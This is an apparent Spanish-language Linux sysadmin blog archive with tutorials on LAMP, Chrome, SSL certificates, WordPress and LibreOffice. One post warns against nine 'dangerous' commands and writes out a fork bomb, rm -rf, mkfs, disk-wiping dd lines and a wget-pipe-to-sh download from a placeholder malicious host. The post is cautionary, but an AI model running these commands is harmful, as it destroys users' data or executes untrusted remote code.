viernes, 13 de enero de 2017

Instalar LAMP en Debian Jessie


LAMP consiste en el sistema operativo basado en Linux, el servidor web Apache, base de datos MySQL y el lenguaje de scripting PHP, es una gran base para la web o el desarrollo de aplicaciones. Instalado en conjunto, esta pila de software permite a su servidor para alojar sitios web dinámicos y aplicaciones web.

Instalar aptitude
$ sudo apt-get install aptitude

Actualizar el Sistema
$ sudo aptitude update

Instalar Apache
$ sudo aptitude install apache2

Instalar MySQL
$ sudo aptitude install mysql-server php5-mysql

Esto instalará MySQL y otros paquetes requeridos. Tenga en cuenta que la rutina de instalación le pedirá que introduzca una nueva contraseña para el usuario root de MySQL

Para mantener a su nuevo servidor de base de datos seguro, hay una secuencia de comandos adicional que necesita para funcionar. Escriba lo siguiente para empezar:
$ sudo mysql_secure_installation

En este punto, el script ahora le hará unas cuantas preguntas. Cuando se le solicite, siga adelante e introduzca la contraseña para la cuenta MySQL root. 

El sistema le pedirá que:
Cambiar la contraseña de root? [Y/n] n
Puesto que ya pusimos la contraseña MySQL root en la instalación, se puede decir que no a este punto. 

El script le preguntará:
Remove anonymous users? [Y/n] y
Responda afirmativamente para eliminar la opción de los usuarios anónimos para mayor seguridad. Usted puede responder sí al resto de las preguntas, introduciendo “y”.

A continuación, la secuencia de comandos le pedirá que si desea permitir o no logins remotos para la cuenta de root. Por razones de seguridad, no permitir logins remotos para root a menos que su entorno requiera esto.

Por último, la secuencia de comandos le pedirá que retire la base de datos de prueba y vuelva a cargar la tabla de privilegios. Conteste sí a ambas cosas. Esto eliminará la base de datos de prueba y procesará los cambios de seguridad.

Si todo es correcto, una vez hecho, el script devolverá con:
All done! If you have completed all of the above steps, your MySQL installation should now be secure.

Instalar PHP
$ sudo aptitude install php5-common libapache2-mod-php5 php5-cli

Acepte la instalación y luego reinicie apache
sudo service apache2 restart

Todos los sitios que cree deberá colocarlos en la carpeta
/var/www/html

Para ver los sitios creados digite su IP pública y estática en el navegador ó si es una máquina local digite localhost





jueves, 5 de enero de 2017

Instalar Google Chrome en Debian Jessie 8


1.- Descargar google-chrome en el siguiente
https://www.google.com.mx/chrome/browser/desktop/

2.- En un terminal como usuario root coloca los siguientes comandos para instalar las dependencias
#apt install libdbusmenu-glib4 libdbusmenu-gtk4 libindicator7 libappindicator1

3.-Luego la instalación del paquete descargado en el paso 1
#dpkg -i '/root/Descargas/google-chrome-stable_current_amd64.deb'


Buscar archivos en su directorio en Solaris


El programa find puede tomar más tiempo cuando debe hacer la búsqueda en muchos directorios. Pero si un usuario busca un archivo, dicho archivo se encuentra en su directorio en general. Puede utilizar este comando para buscar:

find $HOME -name ‘archivo’ -print

Remplace archivo con el nombre del archivo que desea encontrar. El parametro $HOME, le indica a find que sólo busque en su directorio de usuario.

Si el archivo que busca no se encuentra en su directorio de usuario, puede buscar en el sistema o en otros directorios en específico:

find / -name ‘archivo’ -print

Remplace archivo con el nombre del archivo que desea encontrar. Utilizando / el comando find buscará en el sistema entero. Puede remplazar / con un directorio especifico para buscar en ese directorio y los directorios que contiene.

martes, 27 de diciembre de 2016

Certificados SSL auto-firmados


Para establecer una conexión segura y de confianza es necesario generar certificados que respalden la identidad del servidor. Estos certificados son generalmente emitidos por entidades certificadoras (Certificate Authority) independientes y de confianza reconocida. Sin embargo, para una utilización más casera y económica, es posible crear un certificado “auto-firmado”.

Instalación del Certificado

# apt-get install openssl ca-certificates

Generación de los certificados

La generación de un certificadoSSL requiere de los siguientes pasos:
1.- primero es generada una clave privada; 
2.- en seguida ésta es usada para generar un pedido de certificación (Certificate Signing Request (CSR)).
3.- El pedido de certificación es entonces enviado a la entidad certificadora (Certificate Authority (CA)) que devuelve el certificado firmado
NOTA: Es posible ahorrarse el último paso, generando un certificado auto-firmado (Self-signed Certificate).

Crear una carpeta de trabajo
root@server:# mkdir certs
root@server:# cd certs
root@server:~/certs#

Clave privada

Generar una clave privada(Private Key):
root@server:~/certs# openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus
..........+++
...........................................+++
e is 65537 (0x10001)
root@server:~/certs#

Esta clave debe ser almacenada con especial cuidado y sólo debe ser accesible por el usuario root:

root@server:~/certs# chmod 600 server.key

Pedido de certificación

Para generar un pedido de certificación (Certificate Signing Request), debe indicarse en el campo Common Name el nombre del servidor para el cual será generado el certificado. En caso de que un certificado sea requerido por varios servidores del mismo dominio, es posible usar la sintaxis *.home.lan:

root@server:~/certs# openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:VE
State or Province Name (full name) [Some-State]:Venezuela
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:My Home Lan
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:*.home.lan
Email Address []:

Please enter the following `extra` attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Certificado auto-firmado

El pedido de certificación debería ser enviado a la entidad certificadora, que devolvería el certificado firmado. En este caso, será utilizado para crear un certificado (Self-Signed Certificate), válido por 365 días:

root@server:~/certs# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
Signature ok
subject=/C=VE/ST=Venezuela/O=Home Lan/CN=*.home.lan
Getting Private key
Enter pass phrase for server.key:
root@server:~/certs#

El proceso de creación de los certificados concluyó. Al final, fueron generados los siguientes archivos:

Archivo         Descripción
server.key La clave privada
server.csr El pedido de firma del certificación
server.crt         Al certificado auto-firmado


El certificado auto-firmado es válido por 365 días, pero puede ser renovado en cualquier momento, al regenerar el certificado auto-firmado.

Instalación de la clave privada y del certificado auto-firmado

Para esto, debe copiarse las claves privadas en /etc/ssl/private y el certificado en /etc/ssl/certs:

root@server:~/certs# cp server.key /etc/ssl/private/
root@server:~/certs# cp server.crt /etc/ssl/certs/
Así, el certificado auto-firmado está listo para utilizarse.

Como se trata de un certificado auto-firmado, su utilización siempre dará origen a un aviso por parte de la aplicación cliente


martes, 22 de noviembre de 2016

Instalación de WordPress

En esta oportunidad se mostrara como instalar WordPress 

1.- Descargar la Ultima Versión de WordPress del siguiente Link

https://ve.wordpress.org/txt-download/

2.- Descomprime el archivo en una carpeta vacía.
3.- Abre wp-config-sample.php con un editor de texto como Notepad o similar y rellena los datos de tu conexión a la base de datos.
4.- Guarda el archivo como wp-config.php.
5.- Sube todo a tu servidor.
Ve a tu sitio y abre http://www.tudominio.com/wp-admin/install.php en tu navegador. Si hay algún error, haz el favor de comprobar tu archivo wp-config.php e intentar otra vez. Si vuelve a fallar, visita los foros de ayuda con todos los datos que puedas aportar.
5.- Elige tu nombre de usuario y contraseña. Si dejas ambos campos en blanco, se te asignara el nombre de usuario admin y una contraseña al azar.
6.- Se te enviará a la página para que inicies sesión, donde deberás introducir el nombre de usuario y contraseña que seleccionaste en el paso anterior. Si la contraseña te fue proporcionada por el instalador, te recomendamos cambiarla haciendo click en ‘Perfil’.
Eso es todo. ¡Disfruta!

Instalar el archivo de idioma en un sitio existente
Si ya tienes una instalación en línea de la misma versión de WordPress, pero en idioma inglés, puedes cambiar el idioma de tu página usando solamente el archivo de la traducción incluido en el paquete siguiendo estos pasos:

Busca el archivo es_VE.mo en la carpeta  /wp-content/languages/ del paquete y súbelo al directorio /wp-content/languages/ de tu instalación.
Modifica con cualquier editor de texto el archivo  wp-config.php que se encuentra en la carpeta raíz de tu instalación, cambiando el valor define ('WPLANG', '');  por  define ('WPLANG', 'es_VE');
Ahora la administración de tu WordPress aparecerá en español de Venezuela.

Actualizar manualmente
Antes de actualizar nada, asegúrate de tener copias de respaldo de los archivos que hayas modificado.
Haz una Copia de Seguridad de tus archivos y tu base de datos.
Sube los nuevos archivos.
Dirige tu navegador a http://www.tudominio.com/wp-admin/upgrade.php.
Cambios a las plantillas del tema

Si has personalizado las plantillas del tema, puede que tengas que hacer algunos cambios relevantes cuando actualizes entre versiones mayores.

martes, 15 de noviembre de 2016

9 comandos peligrosos en Linux


El shell de Linux es muy potente y sólo una simple instrucción podría llevarnos a eliminar sin querer directorios, archivos, el raíz, etc. Linux no suele pedir confirmación sino que ejecuta el comando de inmediato pudiendo causar la pérdida de datos útiles.
Echa un vistazo a los 9 comandos más "peligrosos":



1. bomba fork
:(){ :|: & };: es una función bash. Una vez ejecutada, se repite varias veces hasta que el sistema se bloquea. Podríamos decir que causa una denegación de servicio hasta el punto que tenemos que reiniciar el servidor.

2. mv directorio/dev/null
mv directorio/dev/null es otro comando arriesgado. dev/null o el dispositivo null descarta todos los datos escritos en el pero informa que la operación de escritura se ha realizado correctamente. Es también conocido como agujero negro o bit bucked.

3. rm -rf 
El comando rm -rf es para borrar archivos o directorios. Siempre hay que tener mucho cuidado al utilizarlo. El parámetro '-r' elimina el contenido de una carpeta de forma recursiva y el parámetro '-f' fuerza la eliminación sin preguntar.

4. mkfs
mkfs puede ser un comando peligroso si no conoces su propósito. Cualquier cosa después de mkfs será formateada y reemplazada por un sistema de archivos en blanco: mkfs, mkfs.ext3, mkfs.bfs, mkfs.ext2, mkfs.minix, mkfs.msdos, mkfs.reiserfs, mkfs.vfat, mkfs.cramfs (este último sin necesidad de tener permisos de administración).

5. bomba tar
Se trata de un archivo empaquetado que "explota" en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en vez de en un directorio nuevo. La forma de evitarlo sería crear y entrar en un directorio nuevo antes de desempaquetarlo o listar el contenido previamente con -t.

6. dd
El comando dd se utiliza para copiar y convertir particiones del disco duro. Sin embargo, puede llegar a ser perjudicial si se especifica el destino equivocado.
El comando puede ser cualquiera de los siguientes:
    dd if=/dev/hda of=/dev/hdb    dd if=/dev/hda of=/dev/sdb    dd if=something of=/dev/hda    dd if=something of=/dev/sda    dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Código shell script
Alguien podría enviarte un enlace para que descarges y ejecutes un shell script. Por ejemplo: wget http://some_malicious_source -O- | sh

8. Código fuente malicioso
Alguien podría facilitarte código fuente para compilarlo. Este código podría parecer un código normal, pero en realidad tratarse de algún código malicioso oculto entre código fuente normal que puede causar daños a tu sistema. Para evitar ser víctima de este tipo de ataque, sólo debes aceptar y compilar el código fuente de fuentes confiables.

9. Bomba de descompresión
Una bomba zip es un archivo que parece ser muy pequeño, de unos pocos KB, pero que cuando se descomprime lo hace en cientos de GB de datos pudiendo llenar tu disco duro para reducir el rendimiento del sistema. Si os acordáis hace tiempo ya hablamos en el blog de ellas.

miércoles, 12 de octubre de 2016

Agregar el idioma al español en LibreOffice con GNU/Linux

Hola comunidad, este articulo trata de como agregar el idioma al español en LibreOffice y GNU/Linux. Básicamente esto se logra insertando la siguiente linea en el terminal, en este ejemplo use la distribución GNU/Linux Ubuntu.
Ingresar un terminal y como root coloca lo siguiente:

#apt-get install libreoffice-help-es libreoffice-l10n-es
Ingresan a la ofimática y el idioma ya estará en español.